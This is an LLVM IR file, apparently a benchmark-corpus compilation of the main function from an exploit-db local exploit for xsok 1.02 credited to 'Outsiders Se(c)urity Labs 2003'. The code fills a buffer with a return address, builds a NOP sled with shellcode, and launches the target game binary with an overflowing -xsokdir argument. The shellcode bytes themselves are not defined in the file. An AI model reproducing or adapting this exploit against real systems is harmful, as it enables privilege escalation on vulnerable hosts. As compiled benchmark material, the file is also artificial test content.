; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_140.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_140.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@RETADD = common dso_local global i32 0, align 4
@SIZE = common dso_local global i32 0, align 4
@stdout = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [58 x i8] c"\0A ---   0x333xsok => xsok 1.02 local games exploit   ---\0A\00", align 1
@.str.1 = private unnamed_addr constant [56 x i8] c"   ---       Outsiders Se(c)urity Labs 2003       ---\0A\0A\00", align 1
@shellcode = common dso_local global i32 0, align 4
@BIN = common dso_local global i32 0, align 4
@.str.2 = private unnamed_addr constant [9 x i8] c"-xsokdir\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i32, align 4
  %7 = alloca i32, align 4
  %8 = alloca i8*, align 8
  %9 = alloca i64, align 8
  %10 = alloca i32*, align 8
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %11 = load i32, i32* @RETADD, align 4
  store i32 %11, i32* %7, align 4
  %12 = load i32, i32* @SIZE, align 4
  %13 = zext i32 %12 to i64
  %14 = call i8* @llvm.stacksave()
  store i8* %14, i8** %8, align 8
  %15 = alloca i8, i64 %13, align 16
  store i64 %13, i64* %9, align 8
  %16 = load i32, i32* @stdout, align 4
  %17 = call i32 @fprintf(i32 %16, i8* getelementptr inbounds ([58 x i8], [58 x i8]* @.str, i64 0, i64 0))
  %18 = load i32, i32* @stdout, align 4
  %19 = call i32 @fprintf(i32 %18, i8* getelementptr inbounds ([56 x i8], [56 x i8]* @.str.1, i64 0, i64 0))
  %20 = bitcast i8* %15 to i32*
  store i32* %20, i32** %10, align 8
  store i32 0, i32* %6, align 4
  br label %21

21:                                               ; preds = %27, %2
  %22 = load i32, i32* %6, align 4
  %23 = load i32, i32* @SIZE, align 4
  %24 = sub nsw i32 %23, 1
  %25 = icmp slt i32 %22, %24
  br i1 %25, label %26, label %33

26:                                               ; preds = %21
  br label %27

27:                                               ; preds = %26
  %28 = load i32, i32* %6, align 4
  %29 = add nsw i32 %28, 4
  store i32 %29, i32* %6, align 4
  %30 = load i32, i32* %7, align 4
  %31 = load i32*, i32** %10, align 8
  %32 = getelementptr inbounds i32, i32* %31, i32 1
  store i32* %32, i32** %10, align 8
  store i32 %30, i32* %31, align 4
  br label %21

33:                                               ; preds = %21
  %34 = call i32 @memset(i8* %15, i32 144, i32 63)
  %35 = getelementptr inbounds i8, i8* %15, i64 63
  %36 = load i32, i32* @shellcode, align 4
  %37 = load i32, i32* @shellcode, align 4
  %38 = call i32 @strlen(i32 %37)
  %39 = call i32 @memcpy(i8* %35, i32 %36, i32 %38)
  %40 = load i32, i32* @BIN, align 4
  %41 = load i32, i32* @BIN, align 4
  %42 = call i32 @execl(i32 %40, i32 %41, i8* getelementptr inbounds ([9 x i8], [9 x i8]* @.str.2, i64 0, i64 0), i8* %15, i32 0)
  %43 = load i8*, i8** %8, align 8
  call void @llvm.stackrestore(i8* %43)
  %44 = load i32, i32* %3, align 4
  ret i32 %44
}

; Function Attrs: nounwind
declare i8* @llvm.stacksave() #1

declare dso_local i32 @fprintf(i32, i8*) #2

declare dso_local i32 @memset(i8*, i32, i32) #2

declare dso_local i32 @memcpy(i8*, i32, i32) #2

declare dso_local i32 @strlen(i32) #2

declare dso_local i32 @execl(i32, i32, i8*, i8*, i32) #2

; Function Attrs: nounwind
declare void @llvm.stackrestore(i8*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
